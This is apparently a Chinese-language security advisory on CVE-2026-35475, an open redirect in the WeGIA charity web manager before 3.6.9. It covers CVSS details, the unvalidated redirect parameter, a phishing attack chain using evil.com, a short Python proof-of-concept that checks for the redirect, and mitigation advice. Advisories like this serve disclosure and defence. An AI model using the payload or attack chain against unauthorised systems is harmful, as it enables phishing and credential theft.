IPBUF安全漏洞报告
English
CVE-2026-35475 CVSS 6.1 中危

CVE-2026-35475 WeGIA开放重定向漏洞

披露日期: 2026-04-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35475
漏洞类型
开放重定向
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
WeGIA

相关标签

开放重定向WeGIAURL重定向钓鱼攻击CVSS-6.1CWE-601

漏洞概述

WeGIA是一款面向慈善机构的Web管理器。在3.6.9之前的版本中,系统存在开放重定向漏洞。由于未对`redirect`参数进行有效的URL验证或白名单检查,攻击者可直接利用该参数构造恶意链接。当受害者点击链接时,将被重定向至攻击者控制的恶意站点。此漏洞可被用于钓鱼攻击,窃取用户凭据或进行其他社会工程学攻击。

技术细节

该漏洞位于WeGIA的重定向处理逻辑中。在受影响版本(< 3.6.9)中,后端代码直接从全局变量`$_GET`中获取`redirect`参数的值,并未经过任何的URL格式校验、域名白名单检查或过滤处理。随后,该用户输入被直接拼接到PHP的`header("Location: ...")`函数中并执行。由于CVSS向量中的UI:R(需要用户交互)和S:C(作用域改变),攻击者无法直接利用此漏洞在服务器端执行代码,但可以通过社会工程学手段诱导用户访问包含恶意`redirect`参数的URL。一旦用户访问,浏览器会跟随Location头跳转,导致用户被重定向到钓鱼网站或恶意下载页面,从而利用受害者的信任进行进一步的攻击。虽然CVSS评分为6.1(中危),但在针对性强的钓鱼活动中具有较高危害。

攻击链分析

STEP 1
侦察
攻击者识别出目标组织正在使用WeGIA系统,且版本低于3.6.9。
STEP 2
武器化
攻击者构造包含恶意URL的`redirect`参数链接(例如:http://target-site.com?redirect=http://evil.com)。
STEP 3
传递
通过钓鱼邮件或社交媒体将含有恶意重定向参数的链接发送给目标用户。
STEP 4
利用
受害者点击链接,WeGIA服务器接收请求并响应302重定向,指向攻击者控制的恶意站点。
STEP 5
行动
受害者到达恶意站点,可能面临凭据窃取或恶意软件下载等风险。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-35475 (Open Redirect in WeGIA) # The vulnerable endpoint accepts a 'redirect' parameter via GET request # and uses it directly in the Location header without validation. import requests def check_open_redirect(target_url): # Malicious external site for redirection test evil_site = "https://evil.com" # Construct the payload # Assuming the vulnerable endpoint is the root or a specific page accepting redirect full_url = f"{target_url}?redirect={evil_site}" try: # Send request, do not follow redirects automatically to check the header response = requests.get(full_url, allow_redirects=False) if response.status_code == 302 or response.status_code == 301: location = response.headers.get('Location') if location and evil_site in location: print(f"[+] Vulnerability Confirmed!") print(f"[+] Server redirected to: {location}") return True print("[-] Vulnerability not detected or endpoint requires specific path.") return False except Exception as e: print(f"Error connecting to target: {e}") if __name__ == "__main__": target = "http://localhost/wegia" # Replace with actual target check_open_redirect(target)

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施
如果无法立即升级软件,应在Web服务器层(如Nginx或Apache)配置入站规则,拦截包含外部域名的`redirect`参数请求。此外,开发人员可临时修改代码,对`redirect`参数进行正则匹配,确保其仅包含允许的域名或以相对路径开头。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表